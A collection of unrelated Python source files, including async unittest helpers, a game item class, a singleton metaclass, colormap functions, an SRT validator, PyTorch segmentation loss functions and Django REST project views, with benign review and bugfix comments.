        DEBUGLOG('serving a request.')
        requestHandler(address, message)
|
import asyncio
import functools
def futurized(o):
    ''' Wrap *o* in an :class:`asyncio.Future` so it can be awaited.

    :param any o: object (or exception instance) to wrap
    :return: awaitable that resolves to ``o``
    :rtype: asyncio.Future

    Awaiting the returned future yields the original object back; if ``o``
    is an Exception instance the ``await`` raises it instead.

    .. code-block:: python

        fut = aiounittest.futurized('SOME TEXT')
        ret = await fut
        print(ret)  # prints SOME TEXT

        fut = aiounittest.futurized(Exception('Dummy error'))
        ret = await fut  # will raise the exception "dummy error"

    The main use case is stubbing coroutines with
    :code:`unittest.mock.Mock` (or :code:`MagicMock`), e.g. for

    .. code-block:: python

        from asyncio import sleep

        async def add(x, y):
            await sleep(666)
            return x + y

    you rather don't want to wait 666 seconds:

    .. code-block:: python

        from aiounittest import futurized, AsyncTestCase
        from unittest.mock import Mock, patch
        import dummy_math

        class MyAddTest(AsyncTestCase):

            async def test_add(self):
                mock_sleep = Mock(return_value=futurized('whatever'))
                patch('dummy_math.sleep', mock_sleep).start()
                ret = await dummy_math.add(5, 6)
                self.assertEqual(ret, 11)
                mock_sleep.assert_called_once_with(666)

            async def test_fail(self):
                mock_sleep = Mock(return_value=futurized(Exception('whatever')))
                patch('dummy_math.sleep', mock_sleep).start()
                with self.assertRaises(Exception) as e:
                    await dummy_math.add(5, 6)
                mock_sleep.assert_called_once_with(666)
    '''
    fut = asyncio.Future()
    # Exceptions resolve by raising on await; everything else by value.
    settle = fut.set_exception if isinstance(o, Exception) else fut.set_result
    settle(o)
    return fut
def run_sync(func=None, loop=None):
    ''' Run the given function (usually a coroutine function) synchronously.

    :param callable func: function to run (mostly coroutine)
    :param ioloop loop: event loop to use to run `func`
    :type loop: event loop or None

    By default a brand new event loop is created (the old one closed).  After
    completion that loop is closed and a fresh default loop is installed,
    leaving asyncio clean.  If a loop is provided it is used as-is and never
    closed -- that is up to the caller.

    **Note**: :code:`aiounittest.async_test` is an alias of
    :code:`aiounittest.helpers.run_sync`

    Works like `pytest.mark.asyncio` (implementation differs) but is
    compatible with :code:`unittest.TestCase`:

    .. code-block:: python

        import unittest
        from aiounittest import async_test

        class MyAsyncTestDecorator(unittest.TestCase):

            @async_test
            async def test_async_add(self):
                ret = await add(5, 6)
                self.assertEqual(ret, 11)

    This function is also used internally by :code:`aiounittest.AsyncTestCase`
    to run coroutines.
    '''
    def get_brand_new_default_event_loop():
        # Close whatever default loop exists, then install a fresh one.
        try:
            old_loop = asyncio.get_event_loop()
            if not old_loop.is_closed():
                old_loop.close()
        except RuntimeError:
            # No current event loop in this thread (newer Python versions
            # raise instead of auto-creating) -- nothing to close.
            pass
        _loop = asyncio.new_event_loop()
        asyncio.set_event_loop(_loop)
        return _loop

    def decorator(f):
        @functools.wraps(f)
        def wrapper(*args, **kwargs):
            nonlocal loop
            use_default_event_loop = loop is None
            if use_default_event_loop:
                loop = get_brand_new_default_event_loop()
            try:
                ret = f(*args, **kwargs)
                future = asyncio.ensure_future(ret, loop=loop)
                return loop.run_until_complete(future)
            finally:
                if use_default_event_loop:
                    # clean up
                    loop.close()
                    # BUGFIX: the original did ``del loop`` here, which
                    # unbound the closure cell so every *second* call of the
                    # wrapped function raised NameError.  Rebinding to None
                    # keeps the wrapper reusable.
                    loop = None
                    # again set a new (unstopped) event loop
                    get_brand_new_default_event_loop()
        return wrapper

    if func is None:
        return decorator
    else:
        return decorator(func)


# Ergonomic alias used as ``@async_test`` in test cases.
async_test = run_sync
|
from items.Item import Item, Cool_Down_Item
from items.Amplifying_Tome import Amplifying_Tome
class Fiendish_Codex(Item, Cool_Down_Item):
    """Fiendish Codex: +30 ability power and 10% cooldown reduction.

    Builds out of an Amplifying Tome.
    """

    def __init__(self):
        Item.__init__(self, name='Fiendish Codex', code=3108, cost=900, sell=630)
        self.sub_items = [Amplifying_Tome()]

    def stats(self, champ):
        """Apply the item's bonuses to ``champ`` and return a summary line."""
        champ.ap_dmg += 30
        self.decrease_cooldown(champ, 0.1)
        # BUGFIX: corrected the typo "damge" -> "damage" in the message.
        return "%s ap damage increase %d, cooldown decrease %d" % (champ.name, 30, 10) + '%'

    def remove_stats(self, champ):
        """Revert exactly what stats() applied and return a summary line."""
        champ.ap_dmg -= 30
        self.increase_cooldown(champ, 0.1)
        return "%s ap damage decrease %d, cooldown increase %d" % (champ.name, 30, 10) + '%'
|
class SingletonMeta(type):
    # Metaclass that transparently forwards class-level attribute access to
    # the class's single INSTANCE object, so ``Cls.x`` reads/writes
    # ``Cls.INSTANCE.x``.  Access to "INSTANCE" itself goes through super()
    # to avoid infinite recursion.
    def __getattr__(cls, name):
        # Only reached when normal class lookup fails; delegate to INSTANCE.
        return (super() if name == "INSTANCE" else cls.INSTANCE).__getattribute__(name)
    def __setattr__(cls, name, value):
        # Assigning INSTANCE stores it on the class itself; any other name
        # lands on the instance.
        (super() if name == "INSTANCE" else cls.INSTANCE).__setattr__(name, value)
class Singleton(metaclass = SingletonMeta):
    # Base class enforcing at most one instance per subclass; the instance
    # registers itself as ``INSTANCE`` on its class so the metaclass can
    # proxy class-level attribute access to it.
    def __init__(self):
        if hasattr(self.__class__, "INSTANCE"):
            raise ValueError(f"Only one instance of {self.__class__} can be created")
        self.__class__.INSTANCE = self
class Global(Singleton):
    # Application-wide attribute bag: ``Global.anything`` proxies to the
    # single instance created below.
    pass
# Eagerly create the one allowed instance so Global is usable immediately.
Global()
|
import plt_tools
import numpy as _np
def clouds():
    """Two-color (blue -> near-black blue) linear colormap for cloud plots;
    bad values render white."""
    dark_blue = plt_tools.colors.Color((0, 0, 0.1))
    bright_blue = plt_tools.colors.Color((0, 0, 1))
    cmap = plt_tools.colormap.creat_cmap(
        colors=_np.array([bright_blue.rgb, dark_blue.rgb]),
        norm='linear',
        log_min=0.1,
        reverse=False,
    )
    cmap.set_bad((1, 1, 1))
    return cmap
def temperature(limit_to=None):
    """Freezing-to-brutal-heat colormap; use slice() for limit_to."""
    palette = [
        plt_tools.colors.Color((246, 207, 255), color_scale=255, model='rgb'),  # freezing
        plt_tools.colors.Color((23, 16, 158), color_scale=255, model='rgb'),    # cold
        plt_tools.colors.Color((41, 153, 41), color_scale=255, model='rgb'),    # moderate
        plt_tools.colors.Color((255, 255, 92), color_scale=255, model='rgb'),   # warm
        plt_tools.colors.Color((191, 19, 0), color_scale=255, model='rgb'),     # brutal heat
    ]
    colors = _np.array([c.rgb for c in palette])
    if limit_to:
        colors = colors[limit_to]
    cmap = plt_tools.colormap.creat_cmap(colors=colors, norm='linear',
                                         log_min=0.1, reverse=False)
    cmap.set_bad((1, 1, 1))  # bad values render white
    return cmap
def relative_humidity(limit_to=None, reverse=False):
    """Bone-dry-to-dripping colormap; use slice() for limit_to."""
    bone_dry = plt_tools.colors.Color((255, 255, 196), color_scale=255, model='rgb')
    nice = plt_tools.colors.Color((191, 93, 20), color_scale=255, model='rgb')
    wet = plt_tools.colors.Color((41, 153, 41), color_scale=255, model='rgb')
    # Tone the green down before its rgb value is read into the array.
    wet.brightness = 0.5
    wet.saturation = 0.7
    dripping = plt_tools.colors.Color((23, 16, 158), color_scale=255, model='rgb')
    colors = _np.array([bone_dry.rgb, nice.rgb, wet.rgb, dripping.rgb])
    if limit_to:
        colors = colors[limit_to]
    cmap = plt_tools.colormap.creat_cmap(colors=colors, norm='linear',
                                         log_min=0.1, reverse=reverse)
    cmap.set_bad((1, 1, 1))  # bad values render white
    return cmap
def particle_concentration(limit_to=None):
    """Clean-air-to-Venus colormap for particle counts; use slice() for
    limit_to."""
    venus = plt_tools.colors.Color((138, 59, 0), color_scale=255, model='rgb')
    venus.brightness *= 0.1  # darken towards black
    unhealthy = plt_tools.colors.Color((191, 19, 0), color_scale=255, model='rgb')
    moderate = plt_tools.colors.Color((255, 255, 92), color_scale=255, model='rgb')
    clean = plt_tools.colors.Color((246, 207, 255), color_scale=255, model='rgb')
    clean.hue -= 0.2  # shift the hue before reading rgb
    colors = _np.array([clean.rgb, moderate.rgb, unhealthy.rgb, venus.rgb])
    if limit_to:
        colors = colors[limit_to]
    cmap = plt_tools.colormap.creat_cmap(colors=colors, norm='linear',
                                         log_min=0.1, reverse=False)
    cmap.set_bad((1, 1, 1))  # bad values render white
    return cmap
from api.models.attachments import Attachment # noqa: F401
from api.models.platform_settings import PlatformPost # noqa: F401
from api.models.publications import Publication # noqa: F401
|
from __future__ import generator_stop
from typing import Tuple
from genutility.fileformats.srt import MalformedFile, SRTFile
from plug import Filetypes
@Filetypes.plugin(["srt"])
class SRT(object):
    """Validator plugin for SubRip (.srt) subtitle files."""

    def __init__(self):
        pass

    def validate(self, path, ext):
        # type: (str, str) -> Tuple[int, str]
        """Parse the whole file; (0, "") on success, (1, message) on error."""
        try:
            with SRTFile(path, "r") as fr:
                for _entry in fr:
                    # Iterating is enough: parsing happens per entry.
                    pass
        except (AssertionError, MalformedFile) as e:
            return (1, str(e))
        return (0, "")
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: Donny You(youansheng@gmail.com)
# Loss function for Semantic Segmentation.
import torch
import torch.nn as nn
import torch.nn.functional as F
class FSCELoss(nn.Module):
    """Cross-entropy loss for semantic segmentation.

    Class weights, reduction mode and ignore index are read (when present)
    from the project ``configer`` under loss.params.
    """
    def __init__(self, configer=None):
        super(FSCELoss, self).__init__()
        self.configer = configer
        weight = None
        if self.configer.exists('loss', 'params') and 'ce_weight' in self.configer.get('loss', 'params'):
            weight = self.configer.get('loss', 'params')['ce_weight']
            weight = torch.FloatTensor(weight).cuda()
        # NOTE(review): 'elementwise_mean' is the pre-1.0 PyTorch spelling of
        # 'mean'; newer torch versions reject it -- confirm target version.
        reduction = 'elementwise_mean'
        if self.configer.exists('loss', 'params') and 'ce_reduction' in self.configer.get('loss', 'params'):
            reduction = self.configer.get('loss', 'params')['ce_reduction']
        ignore_index = -100
        if self.configer.exists('loss', 'params') and 'ce_ignore_index' in self.configer.get('loss', 'params'):
            ignore_index = self.configer.get('loss', 'params')['ce_ignore_index']
        self.ce_loss = nn.CrossEntropyLoss(weight=weight, ignore_index=ignore_index, reduction=reduction)

    def forward(self, inputs, *targets, weights=None, **kwargs):
        # ``inputs`` is either a single prediction tensor or a list of them
        # (deep supervision); ``weights`` optionally scales each prediction.
        loss = 0.0
        if isinstance(inputs, list):
            if weights is None:
                weights = [1.0] * len(inputs)
            for i in range(len(inputs)):
                if len(targets) > 1:
                    # One target supplied per prediction.
                    target = self._scale_target(targets[i], (inputs[i].size(2), inputs[i].size(3)))
                    loss += weights[i] * self.ce_loss(inputs[i], target)
                else:
                    # A single shared target, rescaled per prediction.
                    target = self._scale_target(targets[0], (inputs[i].size(2), inputs[i].size(3)))
                    loss += weights[i] * self.ce_loss(inputs[i], target)
        else:
            target = self._scale_target(targets[0], (inputs.size(2), inputs.size(3)))
            loss = self.ce_loss(inputs, target)
        return loss

    @staticmethod
    def _scale_target(targets_, scaled_size):
        # Nearest-neighbour resize of an integer label map (via float).
        targets = targets_.clone().unsqueeze(1).float()
        targets = F.interpolate(targets, size=scaled_size, mode='nearest')
        return targets.squeeze(1).long()
class FSOhemCELoss(nn.Module):
    """Online hard example mining (OHEM) cross-entropy loss.

    Keeps only pixels whose predicted probability of the true class falls
    below a threshold (while always keeping at least ``ohem_minkeep`` of the
    hardest pixels) and reduces the CE loss over those pixels only.
    """
    def __init__(self, configer):
        super(FSOhemCELoss, self).__init__()
        self.configer = configer
        # Probability threshold below which a pixel counts as "hard".
        self.thresh = self.configer.get('loss', 'params')['ohem_thresh']
        # Keep at least this many pixels so the loss is never empty.
        self.min_kept = max(1, self.configer.get('loss', 'params')['ohem_minkeep'])
        weight = None
        if self.configer.exists('loss', 'params') and 'ce_weight' in self.configer.get('loss', 'params'):
            weight = self.configer.get('loss', 'params')['ce_weight']
            weight = torch.FloatTensor(weight).cuda()
        self.reduction = 'mean'
        if self.configer.exists('loss', 'params') and 'ce_reduction' in self.configer.get('loss', 'params'):
            self.reduction = self.configer.get('loss', 'params')['ce_reduction']
        ignore_index = -100
        if self.configer.exists('loss', 'params') and 'ce_ignore_index' in self.configer.get('loss', 'params'):
            ignore_index = self.configer.get('loss', 'params')['ce_ignore_index']
        self.ignore_label = ignore_index
        # reduction='none' so per-pixel losses can be filtered before reducing.
        self.ce_loss = nn.CrossEntropyLoss(weight=weight, ignore_index=ignore_index, reduction='none')

    def forward(self, predict, target, **kwargs):
        """
        Args:
            predict:(n, c, h, w)
            target:(n, h, w)
            weight (Tensor, optional): a manual rescaling weight given to each class.
                If given, has to be a Tensor of size "nclasses"
        """
        prob_out = F.softmax(predict, dim=1)
        # Temporarily map ignored pixels to class 0 so gather() stays valid;
        # they are excluded again through ``mask`` below.
        tmp_target = target.clone()
        tmp_target[tmp_target == self.ignore_label] = 0
        prob = prob_out.gather(1, tmp_target.unsqueeze(1))
        mask = target.contiguous().view(-1, ) != self.ignore_label
        sort_prob, sort_indices = prob.contiguous().view(-1, )[mask].contiguous().sort()
        # Raise the threshold if needed so at least min_kept pixels survive.
        min_threshold = sort_prob[min(self.min_kept, sort_prob.numel() - 1)] if sort_prob.numel() > 0 else 0.0
        threshold = max(min_threshold, self.thresh)
        loss_matirx = self.ce_loss(predict, target).contiguous().view(-1, )
        # Align the per-pixel losses with the probability-sorted order.
        sort_loss_matirx = loss_matirx[mask][sort_indices]
        select_loss_matrix = sort_loss_matirx[sort_prob < threshold]
        if self.reduction == 'sum' or select_loss_matrix.numel() == 0:
            return select_loss_matrix.sum()
        elif self.reduction == 'mean':
            return select_loss_matrix.mean()
        else:
            raise NotImplementedError('Reduction Error!')
class FSAuxOhemCELoss(nn.Module):
    """Combined loss for networks with an auxiliary head: OHEM cross-entropy
    on the main segmentation output plus plain CE on the auxiliary output,
    mixed with the configured loss weights."""

    def __init__(self, configer=None):
        super(FSAuxOhemCELoss, self).__init__()
        self.configer = configer
        self.ce_loss = FSCELoss(self.configer)
        self.ohem_ce_loss = FSOhemCELoss(self.configer)

    def forward(self, inputs, targets, **kwargs):
        aux_out, seg_out = inputs
        # Main head: hard-example-mined CE at its native resolution.
        seg_loss = self.ohem_ce_loss(seg_out, targets)
        # Auxiliary head: plain CE against labels resized to its output.
        aux_targets = self._scale_target(targets, (aux_out.size(2), aux_out.size(3)))
        aux_loss = self.ce_loss(aux_out, aux_targets)
        total = self.configer.get('loss', 'loss_weights')['seg_loss'] * seg_loss
        total = total + self.configer.get('loss', 'loss_weights')['aux_loss'] * aux_loss
        return total

    @staticmethod
    def _scale_target(targets_, scaled_size):
        # Nearest-neighbour resize of an integer label map (via float).
        labels = targets_.clone().unsqueeze(1).float()
        labels = F.interpolate(labels, size=scaled_size, mode='nearest')
        return labels.squeeze(1).long()
class FSAuxCELoss(nn.Module):
    """Weighted sum of cross-entropy on the main segmentation output and
    cross-entropy on the auxiliary output (labels resized to match)."""

    def __init__(self, configer=None):
        super(FSAuxCELoss, self).__init__()
        self.configer = configer
        self.ce_loss = FSCELoss(self.configer)

    def forward(self, inputs, targets, **kwargs):
        aux_out, seg_out = inputs
        seg_loss = self.ce_loss(seg_out, targets)
        # Resize labels to the auxiliary head's spatial size.
        aux_targets = self._scale_target(targets, (aux_out.size(2), aux_out.size(3)))
        aux_loss = self.ce_loss(aux_out, aux_targets)
        total = self.configer.get('loss', 'loss_weights')['seg_loss'] * seg_loss
        total = total + self.configer.get('loss', 'loss_weights')['aux_loss'] * aux_loss
        return total

    @staticmethod
    def _scale_target(targets_, scaled_size):
        # Nearest-neighbour resize of an integer label map (via float).
        labels = targets_.clone().unsqueeze(1).float()
        labels = F.interpolate(labels, size=scaled_size, mode='nearest')
        return labels.squeeze(1).long()
class FSAuxEncCELoss(nn.Module):
    """Loss for EncNet-style models: CE on the segmentation output, CE on the
    auxiliary output and a semantic-encoding (SE) loss on the encoding head.

    The three terms are mixed with configer loss.loss_weights
    ('seg_loss', 'aux_loss', 'enc_loss').
    """

    def __init__(self, configer=None):
        super(FSAuxEncCELoss, self).__init__()
        self.configer = configer
        self.ce_loss = FSCELoss(self.configer)
        # BUGFIX: this was stored as ``self.se_loss`` while forward() reads
        # ``self.enc_loss``, which raised AttributeError on every call.
        self.enc_loss = FSEncLoss(self.configer)

    def forward(self, outputs, targets, **kwargs):
        aux_out, enc_out, seg_out = outputs
        seg_loss = self.ce_loss(seg_out, targets)
        # Resize labels to the auxiliary head's spatial size.
        aux_targets = self._scale_target(targets, (aux_out.size(2), aux_out.size(3)))
        aux_loss = self.ce_loss(aux_out, aux_targets)
        loss = self.configer.get('loss', 'loss_weights')['seg_loss'] * seg_loss
        loss = loss + self.configer.get('loss', 'loss_weights')['aux_loss'] * aux_loss
        enc_loss = self.enc_loss(enc_out, aux_targets, self.configer.get('loss', 'enc_size'))
        loss = loss + self.configer.get('loss', 'loss_weights')['enc_loss'] * enc_loss
        return loss

    @staticmethod
    def _scale_target(targets_, scaled_size):
        # Nearest-neighbour resize of an integer label map (via float).
        targets = targets_.clone().unsqueeze(1).float()
        targets = F.interpolate(targets, size=scaled_size, mode='nearest')
        return targets.squeeze(1).long()
class FSFocalLoss(nn.Module):
    """Focal loss (Lin et al., 2017) with fixed alpha=0.25.

    The focusing exponent gamma is re-read from configer focal_loss.y on
    every forward call, so it can change at runtime.
    """

    def __init__(self, configer):
        super(FSFocalLoss, self).__init__()
        self.configer = configer

    def forward(self, output, target, **kwargs):
        self.y = self.configer.get('focal_loss', 'y')
        # BUGFIX/modernization: make the softmax dimension explicit; the
        # implicit default was deprecated and resolves to dim=1 for the
        # 2D/4D (n, c, ...) tensors used here.
        P = F.softmax(output, dim=1)
        f_out = F.log_softmax(output, dim=1)
        # Probability of the true class for each sample/pixel.
        Pt = P.gather(1, torch.unsqueeze(target, 1))
        # (1 - p_t)^gamma down-weights well-classified examples.
        focus_p = torch.pow(1 - Pt, self.y)
        alpha = 0.25
        nll_feature = -f_out.gather(1, torch.unsqueeze(target, 1))
        weight_nll = alpha * focus_p * nll_feature
        loss = weight_nll.mean()
        return loss
class FSEncLoss(nn.Module):
    """Semantic-encoding (SE) loss: BCE between predicted class-presence
    logits and the multi-hot vector of classes actually present in the label
    map (optionally evaluated per grid cell)."""

    def __init__(self, configer):
        super(FSEncLoss, self).__init__()
        self.configer = configer
        weight = None
        if self.configer.exists('loss', 'params') and 'enc_weight' in self.configer.get('loss', 'params'):
            weight = self.configer.get('loss', 'params')['enc_weight']
            weight = torch.FloatTensor(weight).cuda()
        # NOTE(review): 'elementwise_mean' is the pre-1.0 PyTorch spelling of
        # 'mean'; newer torch versions reject it -- confirm target version.
        reduction = 'elementwise_mean'
        if self.configer.exists('loss', 'params') and 'enc_reduction' in self.configer.get('loss', 'params'):
            reduction = self.configer.get('loss', 'params')['enc_reduction']
        self.bce_loss = nn.BCELoss(weight, reduction=reduction)

    def forward(self, preds, targets, grid_size=None, **kwargs):
        if len(targets.size()) == 2:
            # Targets are already per-sample presence vectors.
            return self.bce_loss(torch.sigmoid(preds), targets)
        se_target = self._get_batch_label_vector(targets,
                                                 self.configer.get('data', 'num_classes'),
                                                 grid_size).type_as(preds)
        return self.bce_loss(torch.sigmoid(preds), se_target)

    @staticmethod
    def _get_batch_label_vector(target_, num_classes, grid_size=None):
        # target is a 3D label map BxHxW; output is a 2D multi-hot BxnClass
        # (or one row per grid cell when grid_size is given).
        target = target_.clone()
        # BUGFIX: the padding arithmetic used to run unconditionally, so a
        # None grid_size raised TypeError (int % None); it is now guarded.
        if grid_size is not None:
            b, h, w = target.size()
            pad_h = 0 if (h % grid_size == 0) else grid_size - (h % grid_size)
            pad_w = 0 if (w % grid_size == 0) else grid_size - (w % grid_size)
            # Pad with num_classes so padded pixels fall outside histc's
            # [0, num_classes - 1] range and are ignored.
            target = F.pad(target, (0, pad_w, 0, pad_h), "constant", num_classes)
            b, h, w = target.size()
            target = target.contiguous().view(b, h // grid_size, grid_size, w // grid_size, grid_size)
            target = target.permute(0, 1, 3, 2, 4).contiguous().view(b * h * w // (grid_size ** 2),
                                                                     grid_size, grid_size)
        batch = target.size(0)
        tvect = torch.zeros(batch, num_classes)
        for i in range(batch):
            hist = torch.histc(target[i].cpu().data.float(),
                               bins=num_classes, min=0, max=num_classes - 1)
            # Multi-hot: 1 where the class occurs at least once.
            tvect[i] = hist > 0
        return tvect
class FSEmbedLoss(nn.Module):
    """Embedding loss that pulls per-pixel features of the same class toward
    their class centroid (cosine similarity) while pushing different class
    centroids apart.  CUDA-only: all intermediates are allocated on GPU.
    """
    def __init__(self, configer):
        super(FSEmbedLoss, self).__init__()
        self.num_classes = configer.get('data', 'num_classes')
        self.cosine_loss = nn.CosineEmbeddingLoss()

    def forward(self, inputs, targets, **kwargs):
        # Move the feature dimension first: (batch, feat, ...) -> (feat, batch, ...).
        inputs = inputs.transpose(0, 1)
        center_array = torch.zeros((self.num_classes, inputs.size()[0]), requires_grad=True).cuda()
        sim_loss = torch.Tensor([0.0]).cuda()
        sim_loss.requires_grad = True
        mask_list = list()  # classes absent from this batch
        for i in range(self.num_classes):
            mask = self.get_mask(targets, i).unsqueeze(0)
            sum_pixel = max(mask.sum(), 1)  # guard against division by zero
            # print sum_pixel
            mask = mask.contiguous().repeat(inputs.size()[0], 1, 1, 1).byte().cuda()
            sim_input = inputs[mask]
            if sim_input.numel() == 0:
                # Class not present; remember it so the push phase skips it.
                mask_list.append(i)
                continue
            sim_input = sim_input.contiguous().view(inputs.size()[0], -1)
            # Class centroid = mean feature vector over the class's pixels.
            center = torch.sum(sim_input, 1, keepdim=False)
            center = center / sum_pixel
            center_array[i, :] = center
            sim_input = sim_input.permute(1, 0)
            # Pull every pixel feature toward its class centroid (label +1).
            sim_label = torch.ones(sim_input.size()[0], ).float().cuda()
            sim_center = center.contiguous().view(1, -1).repeat(sim_input.size()[0], 1)
            sim_loss = sim_loss + self.cosine_loss(sim_center, sim_input, sim_label)
        diff_loss = torch.Tensor([0.0]).cuda()
        diff_loss.requires_grad = True
        for i in range(self.num_classes):
            if i in mask_list:
                continue
            label = torch.zeros(self.num_classes, ).float().cuda()
            center_dual = torch.zeros((self.num_classes, inputs.size()[0]), requires_grad=True).cuda()
            for k in range(self.num_classes):
                center_dual[k] = center_array[i]
            # +1 for the class itself, -1 for every other class: push apart.
            for j in range(self.num_classes):
                if j == i:
                    label[j] = 1
                else:
                    label[j] = -1
            diff_loss = diff_loss + self.cosine_loss(center_array, center_dual, label)
        embedding_loss = diff_loss + sim_loss
        # print embedding_loss.requires_grad
        return embedding_loss

    def get_mask(self, targets, i):
        # Binary mask of pixels labelled class ``i``.  Class 0 needs the
        # three-step value swap so the 0/1 markers don't collide with the
        # label value itself.
        targets_cp = torch.cuda.FloatTensor(targets.size())
        targets_cp.copy_(targets.data)
        if i == 0:
            targets_cp[targets_cp != 0] = 2
            targets_cp[targets_cp == 0] = 1
            targets_cp[targets_cp == 2] = 0
        else:
            targets_cp[targets_cp != i] = 0
            targets_cp[targets_cp == i] = 1
        return targets_cp
# Smoke-test fixtures (requires a CUDA device); no loss is actually
# evaluated here.
if __name__ == "__main__":
    inputs = torch.ones((3, 5, 6, 6)).cuda()
    targets = torch.ones((3, 6, 6)).cuda()
|
# Crowdsrc imports
from crowdsrc.src.models import *
from crowdsrc.src.serializers import *
from crowdsrc.settings import CREATE, DELETE
from .views import *
# Django imports
from django.db.models import Count, Prefetch
from rest_framework.generics import GenericAPIView, ListAPIView, UpdateAPIView
from rest_framework.mixins import CreateModelMixin, DestroyModelMixin
from rest_framework.status import HTTP_200_OK, HTTP_201_CREATED, HTTP_204_NO_CONTENT, HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED
from rest_framework.viewsets import ModelViewSet
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.filters import SearchFilter
class ProjectMessageView(ListAPIView):
    """Lists a project's team messages, honouring user blocks.

    Messages are hidden in both directions: those written by users who are
    blocking the requester, and those written by users the requester has
    blocked.
    """
    queryset = TeamMessage.objects.all()
    serializer_class = TeamMessageGETSerializer

    def list(self, request, id=None):
        requester = request.user.id
        # Users who are blocking the requester ...
        blockers = BlockedUser.objects.filter(target_id=requester).values('source_id')
        # ... and users the requester is blocking.
        blocking = BlockedUser.objects.filter(source_id=requester).values('target_id')
        messages = (self.queryset.filter(project_id=id)
                    .exclude(user_id__in=blockers)
                    .exclude(user_id__in=blocking))
        serializer = self.serializer_class(messages, many=True)
        return Response(serializer.data, status=HTTP_200_OK)
class ProjectTaskView(ListAPIView):
    """Lists the tasks belonging to the project with the given id."""
    queryset = Task.objects.all()
    serializer_class = TaskGETSerializer

    def list(self, request, id=None):
        tasks = self.queryset.filter(project_id=id)
        serializer = self.serializer_class(
            tasks, many=True, context={'requester_id': request.user.id})
        return Response(serializer.data, status=HTTP_200_OK)
class ProjectViewSet(ModelViewSet):
    # CRUD endpoints for projects, including nested creation of categories,
    # tasks and task skills on POST.
    queryset = Project.objects.all()
    serializer_class = ProjectListGETSerializer
    permission_classes = (IsAuthenticatedOrReadOnly,)
    filter_backends = (SearchFilter,)
    search_fields = ('title', 'description', 'website', 'categories__category__name',
                     'tasks__skills__skill__name')

    def get_serializer_class(self):
        # Write operations use the POST serializer; reads use the list one.
        if self.request.method in ('POST', 'PUT', 'PATCH'):
            return ProjectPOSTSerializer
        else:
            return self.serializer_class

    # Retrieves a project by ID
    def retrieve(self, request, pk=None):
        project = Project.objects.get(id=pk)
        # Get 5 skills that appear in the most tasks on this project
        top_skills = TaskSkill.objects.filter(task__project_id=pk).values('skill').order_by('skill').annotate(
            skill_count=Count('skill')).order_by('-skill_count').values_list('skill__name', 'skill_count').distinct()[:5]
        serializer = ProjectDetailedGETSerializer(
            project, context=self.get_serializer_context())
        # Attach the skill summary on top of the serialized project.
        output = dict(serializer.data)
        output['skills'] = top_skills
        return Response(output, status=HTTP_200_OK,
                        headers=self.get_success_headers(serializer.data))

    # Updates a project iff the requesting user is the user that created
    # the project.
    def partial_update(self, request, pk=None):
        instance = self.queryset.get(id=pk)
        # Check auth token before performing the action
        if instance.user_id != request.user.id:
            return Response(status=HTTP_401_UNAUTHORIZED)
        # NOTE(review): ``timezone``, ``UPDATE`` and ``log_event`` are not
        # imported here by name -- presumably provided by the wildcard
        # imports above; confirm.
        request.data['last_updated'] = timezone.now()
        serializer = ProjectPOSTSerializer(
            self.queryset.get(id=pk), data=request.data, partial=True)
        if serializer.is_valid():
            serializer.save()
            log_event(request, instance, self.queryset.get(id=pk), UPDATE)
            return Response(ProjectDetailedGETSerializer(self.queryset.get(id=pk)).data, status=HTTP_200_OK)
        return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)

    # Creates a new project if the requesting user is authenticated
    def create(self, request, *args, **kwargs):
        # NOTE(review): pop() without a default raises KeyError (=> 500)
        # when 'categories'/'tasks' are absent from the payload -- confirm
        # clients always send both keys.
        category_data = request.data.pop('categories')
        task_data = request.data.pop('tasks')
        request.data['user'] = request.user.id
        serializer = ProjectPOSTSerializer(data=request.data)
        if serializer.is_valid():
            serializer.save()
            instance = self.queryset.get(id=serializer.data.get('id'))
            log_event(request, None, instance, CREATE)
            # Create project categories objects
            for category_name in category_data:
                # Skip empty / whitespace-only category names.
                if not category_name or category_name.isspace():
                    continue
                category, _ = Category.objects.get_or_create(
                    name=category_name)
                category_serializer = ProjectCategoryPOSTSerializer(
                    data={'project': instance.id, 'category': category.id})
                if category_serializer.is_valid():
                    category_serializer.save()
                    log_event(request, None, ProjectCategory.objects.get(
                        id=category_serializer.data.get('id')), CREATE)
            # Create task objects
            for task in task_data:
                skill_data = task.pop('skills')
                task_serializer = TaskPOSTSerializer(
                    data={'project': instance.id, 'title': task.get('title'), 'description': task.get('description')})
                if task_serializer.is_valid():
                    task_serializer.save()
                    task = Task.objects.get(id=task_serializer.data.get('id'))
                    log_event(request, None, task, CREATE)
                    # Create task skill objects
                    for skill_name in skill_data:
                        # Skip empty / whitespace-only skill names.
                        if not skill_name or skill_name.isspace():
                            continue
                        skill, _ = Skill.objects.get_or_create(name=skill_name)
                        skill_serializer = TaskSkillPOSTSerializer(
                            data={'task': task.id, 'skill': skill.id})
                        if skill_serializer.is_valid():
                            skill_serializer.save()
                            log_event(request, None, TaskSkill.objects.get(
                                id=skill_serializer.data.get('id')), CREATE)
            return Response(serializer.data, status=HTTP_201_CREATED,
                            headers=self.get_success_headers(serializer.data))
        return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)
class ProjectCategoryView(GenericAPIView, CreateModelMixin, DestroyModelMixin):
    """Adds a category to a project (POST) or removes one (DELETE).

    Both actions require the requester to be the project's creator: a
    non-creator gets 401, any other lookup failure gets 400.
    """
    queryset = ProjectCategory.objects.all()
    serializer_class = ProjectCategoryPOSTSerializer

    def post(self, request, project_id=None, category_name=None, *args, **kwargs):
        try:
            project = Project.objects.get(id=project_id)
            if project.user_id != request.user.id:
                raise ValueError('Must be project creator')
        except ValueError:
            return Response(status=HTTP_401_UNAUTHORIZED)
        # BUGFIX: was a bare ``except:`` which also swallowed SystemExit and
        # KeyboardInterrupt.
        except Exception:
            return Response(status=HTTP_400_BAD_REQUEST)
        # BUGFIX: check emptiness first -- calling .isspace() on a missing
        # (None) category name used to raise AttributeError.
        if not category_name or category_name.isspace():
            return Response('Category cannot be whitespace', status=HTTP_400_BAD_REQUEST)
        category, _ = Category.objects.get_or_create(name=category_name)
        serializer = self.serializer_class(data={'project': project_id,
                                                 'category': category.id})
        if serializer.is_valid():
            serializer.save()
            log_event(request, None, self.queryset.get(
                id=serializer.data.get('id')), CREATE)
            return Response(CategorySerializer(category).data, status=HTTP_201_CREATED)
        return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)

